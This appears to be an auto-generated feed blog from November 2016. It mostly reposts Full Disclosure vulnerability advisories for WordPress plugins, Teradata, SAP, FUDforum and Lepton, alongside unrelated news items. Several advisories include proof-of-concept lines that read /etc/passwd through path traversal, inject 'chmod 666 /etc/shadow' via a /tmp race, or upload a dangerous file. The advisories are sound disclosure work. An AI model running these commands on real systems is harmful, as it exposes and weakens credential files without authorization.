Latest YouTube Video

Saturday, November 19, 2016

Gamblers Anonymous Logo

I got to be a contestant to this year's AIGA Command X and had an unbelievable experience. This logo was for the first challeng...

from Google Alert - anonymous http://ift.tt/2ffkbIY
via IFTTT

I have a new follower on Twitter


Shawn Elledge
CEO - Integrated Marketing Association is dedicated to the continued education and support of BtoB and BtoC marketers Next Event Tampa Oct 12-13th
Tampa, FL
https://t.co/jfEJ4KorVR
Following: 9633 - Followers: 14249

November 19, 2016 at 06:38AM via Twitter http://twitter.com/iMarketingAssn

Dangerous Rootkit found Pre-Installed on nearly 3 Million Android Phones

Here's some bad news for Android users again. Nearly 3 Million Android devices worldwide are vulnerable to man-in-the-middle (MITM) attacks that could allow attackers to remotely execute arbitrary code with root privileges, turning over full control of the devices to hackers. According to a new report from security rating firm BitSight, the issue is due to a vulnerability in the insecure


from The Hacker News http://ift.tt/2eQDz0l
via IFTTT

[FD] Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Persistent Cross-Site Scripting in Instagram Feed plugin via CSRF

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Huge IT Portfolio Gallery WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Check Email WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Philadelphia Perigee Full Moon


A supermoon sets over the metropolis of Philadelphia in this twilight snapshot captured on November 14 at 6:21am Eastern Standard Time. Within hours of the Moon's exact full phase, that time does correspond to a lunar perigee or the closest point in the Moon's elliptical orbit around our fair planet. Slightly bigger and brighter at perigee, this Full Moon is still flattened and distorted in appearance by refraction in atmospheric layers along the sight-line near the horizon. Also like more ordinary Full Moons, it shines with the warm color of sunlight. Joined by buildings along the Philadelphia skyline, the perigee full moonlight is reflected in the waters of the mighty Cooper River. via NASA http://ift.tt/2f7q2wQ

Friday, November 18, 2016

Actors Anonymous (2016)

Join · Log in · Host videos · Compare plans · Professionals · Businesses · Video lovers · Video School · Watch · Staff Picks · Categories · Channels ...

from Google Alert - anonymous http://ift.tt/2fNXQR3
via IFTTT

[FD] Tetris heap spraying: spraying the heap on a budget

L.S. Over the past decade, heap sprays have become almost synonymous with exploits in web-browsers. After having developed my first practical implementation of a heap spray about ten years ago, I found that the amount of memory needed in some cases was too much for a realistic attack scenario. I needed a new kind of heap spray that did not allocate as much RAM as traditional heap sprays do. So, I developed a heap spray that uses significantly less RAM than a traditional heap spray does. In practice it uses about 33% less in most cases, but theoretically it could be much, mush less in ideal situations. This technique requires only the ability to free some of the blocks of memory used to spray the heap during spraying and should otherwise be applicable to every existing implementation. I wrote an article on my blog that describes the technical details of this technique, you can find it here: http://ift.tt/2fnwpx8 I recently used this technique in a Proof-of-Concept for a vulnerability in Microsoft Edge. You can find details about that vulnerability and the PoC here: http://ift.tt/2gmQXKm Cheers, SkyLined

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-3247 Microsoft Edge CTextExtractor::GetBlockText OOB read details

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the fourteenth entry in that series. Unfortunately I won't be able to publish everything within one month at the current rate, so I may continue to publish these through December and January. The below information is available in more detail on my blog at http://ift.tt/2gmQXKm. Follow me on http://twitter.com/berendjanwever for daily browser bugs. Microsoft Edge CTextExtractor::GetBlockText OOB read ===================================== (MS16-104, CVE-2016-3247) Synopsis

Source: Gmail -> IFTTT-> Blogger

Rumor Central: Orioles interested in free-agent relief pitchers Kevin Jepsen and Anthony Bass - Baltimore Sun (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous

Showing 1-24 of 67 results for “Anonymous”. Sorted by date added, Popularity, Relevance, Release date, Title, Author. Filters. Filter search results.

from Google Alert - anonymous http://ift.tt/2g5lg5a
via IFTTT

Ravens: Joe Flacco says Ray Lewis' comments that the QB lacked passion for football were "a little surprising" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] SQL injection and unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) (WordPress plugin)

Details ================ Software: Relevanssi Premium Version: v1.14.4 Homepage: http://ift.tt/2bvnI2H Advisory report: http://ift.tt/2g34XIs CVE: Awaiting assignment CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C) Description ================ SQL injection and unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) Vulnerability ================ Relevanssi has a search function on the admin side that is not visible in the user interface, however the code is there and can be called. This functionality contains an sql injection, and this sql injection can be exploited to pass user controlled values into an unserialization call and run arbitrary code (if there are classes available with particular methods such as __destruct). If a logged in admin user is tricked into going to an attacker controlled website, JavaScript could be written to make the admins browser submit the above request, without their knowledge (see 2.3 Social engineering, p.18). Alternatively this attack can be exploited by an attacker with Admin privileges. Proof of concept ================ Achieving arbitrary code execution depends on which classes are available (i.e. which plugins and themes are installed and active). It won’t be possible in all situations. Mitigations ================ Upgrade to version 1.14.6.1 or later. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2016-10-07: Discovered 2016-11-01: Reported 2016-11-02: Vendor reported fixed 2016-11-17: Requested CVE 2016-11-17: Advisory published Discovered by dxw: ================ Glyn Wintle Please visit security.dxw.com for more information.

Source: Gmail -> IFTTT-> Blogger

[FD] Unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) (WordPress plugin)

Details ================ Software: Relevanssi Premium Version: v1.14.4 Homepage: http://ift.tt/2bvnI2H Advisory report: http://ift.tt/2faTWDu CVE: Awaiting assignment CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C) Description ================ Unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) Vulnerability ================ If logged in as an admin on any site you can go to settings, Relevanssi Premium, import or export options. This is a text field that accepts a serialised PHP object. It is possible to submit a string that contains an evil encoded object that executes arbitrary code (if there are classes available with particular methods such as __destruct). Proof of concept ================ Achieving arbitrary code execution depends on which classes are available (i.e. which plugins and themes are installed and active). It won’t be possible in all situations. Mitigations ================ Upgrade to version 1.14.6.1 or later. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2016-10-07: Discovered 2016-11-01: Reported 2016-11-02: Vendor reported fixed 2016-11-17: Requested CVE 2016-11-17: Advisory published Discovered by dxw: ================ Glyn Wintle Please visit security.dxw.com for more information.

Source: Gmail -> IFTTT-> Blogger

[FD] Unserialisation in Post Indexer could allow man-in-the-middle to execute arbitrary code (in some circumstances) (WordPress plugin)

Details ================ Software: Post Indexer Version: 3.0.6.1 Homepage: http://ift.tt/1dXkFQj Advisory report: http://ift.tt/2g1TQvQ CVE: Awaiting assignment CVSS: 7.6 (High; AV:N/AC:H/Au:N/C:C/I:C/A:C) Description ================ Unserialisation in Post Indexer could allow man-in-the-middle to execute arbitrary code (in some circumstances) Vulnerability ================ Twice a day the blog makes an automated unencrypted HTTP request to premium.wpmudev.org and the value that is returned is passed to unserialize(). It is possible for premium.wpmudev.org or any one on the network in a man-in-the-middle position to return a string that contains an evil encoded object that executes arbitrary code (depending on the active plugins and themes). This code is called twice a day by wp_schedule_event(time(), \'twicedaily\', \'wpmudev_scheduled_jobs\') (extra/wpmudev-dash-notification.php): var $server_url = \'http://ift.tt/2faTuVS\'; // line 12 $url = $this->server_url . \'?action=check&un-version=3.3.3&wp=\' . urlencode($wp) . \'&bcount=\' . $blog_count . \'&domain=\' . urlencode(network_site_url()) . $projects; // line 393 $response = wp_remote_get($url, $options); // line 400 $data = $response[\'body\']; // line 402 $data = unserialize($data); // line 404 There is a class called ProcessLocker in this plugin with an exploitable __destruct method, which could be used as a jumping-off point for attacks using this unserialize() vulnerability (or the use of unserialize() in WordPress core which requires access to the database to exploit). Proof of concept ================ Achieving arbitrary code execution depends on which classes are available (i.e. which plugins and themes are installed and active). It won’t be possible in all situations. Mitigations ================ Upgrade to version 3.0.6.2 or later. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2016-11-01: Discovered 2016-11-14: Reported to plugin author via http://ift.tt/1I0mslh 2016-11-14: Plugin author responded 2016-11-17: Confirmed that version 3.0.6.2 fixes the issue 2016-11-17: Requested CVE 2016-11-17: Advisory published Discovered by dxw: ================ Glyn Wintle Please visit security.dxw.com for more information.

Source: Gmail -> IFTTT-> Blogger

[FD] SQL Injection in Post Indexer allows super admins to read the contents of the database (WordPress plugin)

Details ================ Software: Post Indexer Version: 3.0.6.1 Homepage: http://ift.tt/1dXkFQj Advisory report: http://ift.tt/2g1Rqxb CVE: Awaiting assignment CVSS: 4 (Medium; AV:N/AC:L/Au:S/C:P/I:N/A:N) Description ================ SQL Injection in Post Indexer allows super admins to read the contents of the database Vulnerability ================ Post Indexer does not use prepared queries in many cases and in some of its database calls it uses backticks (`). These are not automatically escaped by WordPress, thus leading to the possibility of SQL injection. In other places in the code it simply takes user controlled values and adds them to SQL queries. An example of this is remove_post_older_than: // classes/class.model.php line 589 function remove_posts_older_than( $unit, $period ) { // ... $sql = $this->db->prepare( \"SELECT BLOG_ID, ID FROM {$this->network_posts} WHERE DATE_ADD(post_date, INTERVAL %d \" . $period . \") < CURRENT_DATE() LIMIT %d\", $unit, PI_CRON_TIDY_DELETE_LIMIT ); $posts = $this->db->get_results( $sql ); // ... } The value of $period is user-controlled and could easily be replaced with SQL: // classes/cron.postindexerrebuild.php line 310 function process_tidy_agedposts($DEBUG = false) { // ... // The default is to remove posts from the index when they are over a year old $agedposts = get_site_option( \'postindexer_agedposts\', array( \'agedunit\' => 1, \'agedperiod\' => \'year\' ) ); // ... $this->model->remove_posts_older_than( $agedposts[\'agedunit\'], $agedposts[\'agedperiod\'] ); // ... } To exploit this vulnerability you need to be a super admin. Proof of concept ================ Mitigations ================ Upgrade to version 3.0.6.2 or later. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2016-11-01: Discovered 2016-11-14: Reported to plugin author via http://ift.tt/1I0mslh 2016-11-14: Plugin author responded 2016-11-17: Confirmed that version 3.0.6.2 fixes the issue 2016-11-17: Requested CVE 2016-11-17: Advisory published Discovered by dxw: ================ Glyn Wintle Please visit security.dxw.com for more information.

Source: Gmail -> IFTTT-> Blogger

[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall

Title: /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall Author: Larry W. Cashdollar, @_larry0 Date: 2016-10-03 Download Site: http://ift.tt/1m6upH7 Vendor: Teradata Vendor Notified: 2016-10-03 Vendor Contact: web form contact Description: Teradata Studio Express provides an information discovery tool that retrieves data from Teradata Database systems and allows the data to be manipulated and stored on the desktop. It is built on the Eclipse Rich Client Platform (RCP). Vulnerability: The installation script for TeradataStudioExpress.15.12.00.00 creates files in /tmp insecurely. A malicious local user could create a symlink in /tmp and possibly clobber system files or perhaps elevate privileges. $ grep -n "/tmp" studioexpressinstall 33:ASKDIRFILE=/tmp/sqlajeaskdir 41:DEF_TRACEFILE=/tmp/studioexinstall.log 44:TMP=/tmp 72:SQLAJEINPUTS=/tmp/studioexinputs 90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out 103:SQLAJEINSTALL=/tmp/studioexpressinstall 136: java -version > "/tmp/javaver" 2>&1 137: verstring=`grep "java version" /tmp/javaver` 143: jre64b=`grep "64-Bit" /tmp/javaver` 212:rm -f /tmp/javaver 341: tmptracefile=/tmp/studioexinstall.log.tmp #Temporary trace file. 588:touch /tmp/checkstudioexinstall 603:rm -f /tmp/checkstudioexinstall 604:rm -f /tmp/studioexinstall_rpmcmd.out CVE-ID: CVE-2016-7490 Export: JSON TEXT XML Exploit Code: • $ ln -s /tmp/javaver /etc/passed Advisory: http://ift.tt/2eTLGEL

Source: Gmail -> IFTTT-> Blogger

[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp

Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp Author: Larry W. Cashdollar, @_larry0 Date: 2016-10-01 Download Site: http://ift.tt/2eGJjoM Vendor: Teradata Vendor Notified: 2016-10-01 Vendor Contact: web form contact Description: Teradata is a relational database, they provide a Virtual Machine image for developers and community use. Vulnerability: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp may lead to elevated code execution. In /opt/teradata/gsctools/bin/t2a.pl 320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr >/dev/null 2>&1` ; If a regular user controls /tmp/t2a.pl.get_profile.scr before the person executing this script creates it they can inject commands to be executed as that user. for example: $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done If root or any other account runs that .pl script I see these files being created in /tmp [C] -rw-

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-16-032] SAP Telnet Console – Directory traversal vulnerability

Application: SAP NetWeaver AS JAVA Versions Affected: SAP NetWeaver AS JAVA 7.1 to 7.5 Vendor URL: http://SAP.com Bugs: Directory traversal Sent: 04.12.2015 Reported: 05.12.2015 Vendor response: 05.12.2015 Date of Public Advisory: 09.08.2016 Reference: SAP Security Note 2280371 Author: Mathieu Geli (ERPScan) Description 1. ADVISORY INFORMATION Title: [ERPSCAN-16-032] SAP Telnet Console – Directory traversal vulnerability Advisory ID:[ERPSCAN-16-032] Risk: high Advisory URL: http://ift.tt/2gpI97g Date published: 11.11.2016 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: Directory traversal Impact: read file from system Remotely Exploitable: yes Locally Exploitable: yes CVSS Information CVSS Base Score v3: 3.4 / 10 CVSS Base Vector: AV : Attack Vector (Related exploit range) Adjacent (A) AC : Attack Complexity (Required attack complexity) Low (L) PR : Privileges Required (Level of privileges needed to exploit) High (H) UI : User Interaction (Required user participation) None (N) S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed (C) C : Impact to Confidentiality Low (L) I : Impact to Integrity None (N) A : Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION An authenticated user can disclose file content outside of the JVM through the SAP Telnet Console service. 4. VULNERABLE PACKAGES J2EE ENGINE SERVERCORE 7.10 J2EE ENGINE SERVERCORE 7.11 J2EE ENGINE SERVERCORE 7.20 J2EE ENGINE SERVERCORE 7.30 J2EE ENGINE SERVERCORE 7.31 J2EE ENGINE SERVERCORE 7.40 J2EE ENGINE SERVERCORE 7.50 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2280371 6. AUTHOR Mathieu Geli (ERPScan) 7. TECHNICAL DESCRIPTION SAP Netweaver Telnet Console File Disclosure via the GREP command of the SYSTEM admin group. 7.1. Proof of Concept GREP ":" /etc/passwd at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash [...] 8. REPORT TIMELINE Sent: 04.12.2015 Reported: 05.12.2015 Vendor response: 05.12.2015 Date of Public Advisory: 09.08.2016 9. REFERENCES http://ift.tt/2gpI97g 10. ABOUT ERPScan Research ERPScan research team specializes in vulnerability research and analysis of critical enterprise applications. It was acknowledged multiple times by the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud of discovering new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug" nomination at BlackHat 2013. ERPScan experts participated as speakers, presenters, and trainers at 60+ prime international security conferences in 25+ countries across the continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for several Fortune 2000 companies. ERPScan researchers carry out the EAS-SEC project that is focused on enterprise application security awareness by issuing annual SAP security researches. ERPScan experts were interviewed in specialized info-sec resources and featured in major media worldwide. Among them there are Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. Our team consists of highly-qualified researchers, specialized in various fields of cybersecurity (from web application to ICS/SCADA systems), gathering their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is the most respected and credible Business Application Cybersecurity provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial, Retail and other organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security and provide solutions for CISO's to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both cyberattacks and internal fraud. As a rule, our clients are large enterprises, Fortune 2000 companies and MSPs, whose requirements are to actively monitor and manage security of vast SAP and Oracle landscapes on a global scale. We ‘follow the sun’ and have two hubs, located in Palo Alto and Amsterdam, to provide threat intelligence services, continuous support and to operate local offices and partner network spanning 20+ countries around the globe. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-16-031] SAP NetWeaver AS ABAP – directory traversal using READ DATASET

Application: SAP NetWeaver AS ABAP Versions Affected: SAP NetWeaver AS ABAP 7.4 Vendor URL: http://SAP.com Bugs: Directory traversal Sent: 22.04.2016 Reported: 23.04.2016 Vendor response: 23.04.2016 Date of Public Advisory: 09.08.2016 Reference: SAP Security Note 2312966 Author: Daria Prosochkina (ERPScan) Description 1. ADVISORY INFORMATION Title: [ERPSCAN-16-031] SAP NetWeaver AS ABAP – directory traversal using READ DATASET Advisory ID: [ERPSCAN-16-031] Risk: high Advisory URL: http://ift.tt/2gpIB5s Date published: 11.11.2016 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: Directory traversal Impact: read file from system Remotely Exploitable: yes Locally Exploitable: yes CVSS Information CVSS Base Score v3: 4.3 / 10 CVSS Base Vector: AV : Attack Vector (Related exploit range) Network (N) AC : Attack Complexity (Required attack complexity) Low (L) PR : Privileges Required (Level of privileges needed to exploit) Low (L) UI : User Interaction (Required user participation) None (N) S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U) C : Impact to Confidentiality Low (L) I : Impact to Integrity None (N) A : Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION The code provides access to the file specified after the READ DATASET statement. The variable transmitted to the input of the statement is entered in it by user input. Thus, the user can access the files stored on the operating system. This vulnerability is called a Directory Traversal. The attack is possible if the application does not check the user data and does not delete special characters used for a directory traversal attack from the variable, in which the filename is passed. As a result, an attacker can read data from all files, to which the application has access. To discover this vulnerability, data flow analysis and other unique techniques are used. 4. VULNERABLE PACKAGES SAP_ABA 700 SAP_ABA 701 SAP_ABA 702 SAP_ABA 710 SAP_ABA 711 SAP_ABA 730 SAP_ABA 731 SAP_ABA 740 SAP_ABA 750 SAP_ABA 751 SAP_ABA 75A SAP_ABA 75B 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2312966 6. AUTHOR Daria Prosochkina (ERPScan) 7. TECHNICAL DESCRIPTION Attacker can read any file from OS with use BUPA_BIP_FILE_IMPORT program. Filename used in statement READ DATASET (line 428) is entered in this statement by user input. User can pass to input arbitrary filepath, for example /etc/passwd. As a result of execution of the BUPA_BIP_FILE_IMPORT program, data from /etc/passwd will be written in P_FLEN variable in hex format. Vulnerable code 426. p_flen = 0. 427. DO. 428. READ DATASET p_ifilea INTO lw. 429.* Exit conditions for accessing in a loop 430. IF sy-subrc NE 0. EXIT. ENDIF. 431. APPEND lw TO p_itab . 432. 433. p_flen = p_flen + XSTRLEN( lw-d ) . 434. ENDDO. 8. REPORT TIMELINE Sent: 22.04.2016 Reported: 23.04.2016 Vendor response: 23.04.2016 Date of Public Advisory: 09.08.2016 9. REFERENCES http://ift.tt/2gpIB5s 10. ABOUT ERPScan Research ERPScan research team specializes in vulnerability research and analysis of critical enterprise applications. It was acknowledged multiple times by the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud of discovering new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug" nomination at BlackHat 2013. ERPScan experts participated as speakers, presenters, and trainers at 60+ prime international security conferences in 25+ countries across the continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for several Fortune 2000 companies. ERPScan researchers carry out the EAS-SEC project that is focused on enterprise application security awareness by issuing annual SAP security researches. ERPScan experts were interviewed in specialized info-sec resources and featured in major media worldwide. Among them, there are Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. Our team consists of highly-qualified researchers, specialized in various fields of cybersecurity (from web application to ICS/SCADA systems), gathering their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is the most respected and credible Business Application Cybersecurity provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial, Retail and other organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security and provide solutions for CISO's to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both cyberattacks and internal fraud. As a rule, our clients are large enterprises, Fortune 2000 companies and MSPs, whose requirements are to actively monitor and manage security of vast SAP and Oracle landscapes on a global scale. We ‘follow the sun’ and have two hubs, located in Palo Alto and Amsterdam, to provide threat intelligence services, continuous support and to operate local offices and partner network spanning 20+ countries around the globe. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan

Source: Gmail -> IFTTT-> Blogger

[FD] FUDforum 3.0.6: LFI

Security Advisory - Curesec Research Team 1. Introduction Affected Product: FUDforum 3.0.6 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/Uef24o Vulnerability Type: LFI Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 11/10/2016 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials are required. 3. Details CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description: The "file" parameter of the hlplist.php script is vulnerable to directory traversal, which allows the viewing of arbitrary files. Proof of Concept: http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ= 4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 04/11/2016 Informed Vendor about Issue (no reply) 09/14/2016 Reminded Vendor (no reply) 11/10/2016 Disclosed to public Blog Reference: http://ift.tt/2g325sF

Source: Gmail -> IFTTT-> Blogger

[FD] FUDforum 3.0.6: Multiple Persistent XSS & Login CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: FUDforum 3.0.6 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/Uef24o Vulnerability Type: XSS, Login CSRF Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 11/10/2016 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to multiple persistent XSS issues. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum is vulnerable to Login-CSRF. 3. Details XSS 1: Via Filename in Private Message CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The filename of attached images in private messages is vulnerable to persistent XSS. Proof of Concept: Send a PM to a user. Add an attachment, where the filename is: '">.jpg When the recipient views the PM, the injected code will be executed. XSS 2: Via Filename in Forum Posts CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The filename of attached images in forum posts is vulnerable to persistent XSS. Proof of Concept: Create a new forum post. Add an attachment, where the filename is: '">.jpg When viewing the post the injected code will be executed. XSS 3: Via Signature in User Profile CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: When editing a profile, the signature is echoed unencoded, leading to persistent XSS. Proof of Concept: Visit http://localhost/fudforum/index.php?t=register as signature, use '"></ textarea> The injected code is either executed when the user themselves edits their profile - which may be exploited via login CSRF - or when an admin visits the edit profile page located here: http:// localhost/fudforum/index.php?t=register&mod_id=6&&SQ= 1a85a858f326ec6602cb6d78d698f60a Login CSRF CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: The login of FUDForum does not have any CSRF protection. The impact of this is low, but an attacker might get a victim to disclose sensitive information by using CSRF to log the victim into an attacker-controlled account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the user area. Proof of Concept:
4. Solution This issue was not fixed by the vendor. 5. Report Timeline 04/11/2016 Informed Vendor about Issue (no reply) 09/14/2016 Reminded Vendor (no reply) 11/10/2016 Disclosed to public Blog Reference: http://ift.tt/2fnuCrG

Source: Gmail -> IFTTT-> Blogger

[FD] Lepton 2.2.2: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: LEPTON 2.2.2 stable Fixed in: 2.3.0 Fixed Version Link: http://ift.tt/2fLwZoM important-lepton-2.3.0-101.php Vendor Website: http://ift.tt/2g2ZQb7 Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to 11/10/2016 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to code execution as it is possible to upload files with dangerous type via the media manager. 3. Details Upload of file with dangerous type CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description: When uploading a file in the media tab, there is a client-side as well as a server-side extension check. The server-side check can be bypassed by including a valid extension before the desired extension, leading to code execution or XSS. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken= 099c871bbf640f2f91d2az1472132032 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: lep9131sessionid= 8bgkd5rae5nhbn0jaac8jpkpc5 Connection: close Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling

Security Advisory - Curesec Research Team 1. Introduction Affected Product: LEPTON 2.2.2 stable Fixed in: 2.3.0 Fixed Version http://ift.tt/2fLwZoM Link: important-lepton-2.3.0-101.php Vendor Website: http://ift.tt/2g2ZQb7 Vulnerability CSRF, Open Redirect, Insecure Bruteforce Protection & Type: Password Handling Remote Yes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 11/10/2016 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Lepton is a content management system written in PHP. In version 2.2.2, it contains various low to medium impact issues. The functionality that operates on files and folders is vulnerable to CSRF which may lead to XSS, the logout is vulnerable to Open Redirect, the in-build bruteforce protection can be easily bypassed, and passwords are hashed with md5 and send out via email in plaintext. 3. Details CSRF CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P Description: All actions on folders and files are missing CSRF protection. Because of this, an attacker can delete, create, or rename folders and files. An attacker could for example create .html files which would lead to an XSS attack. Proof of Concept: Delete Folder:
Create File:
</ body> Open Redirect CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP Description: The redirect parameter of the logout script is vulnerable to open redirect. Proof of Concept: http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http:// google.com Insufficient Bruteforce Protection Description: The bruteforce protection works on a per-session base, which is easily bypassed by an attacker by simply requesting a new session by not sending the current, locked session information. The current bruteforce protection may provide a false sense of security and should thus be removed or changed. Code: if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); } Password Handling The password reset functionality sends a newly generated password in plaintext via email, which is not recommended. Additionally, md5 is used for hashing, which is also not recommended. 4. Solution To mitigate this issue please upgrade at least to version 2.3.0: http://ift.tt/2fLwOda Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/06/2016 Vendor requests 60 days to release fix 10/25/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: http://ift.tt/2f6T1kz

Source: Gmail -> IFTTT-> Blogger

[FD] Lepton 2.2.2: SQL Injection

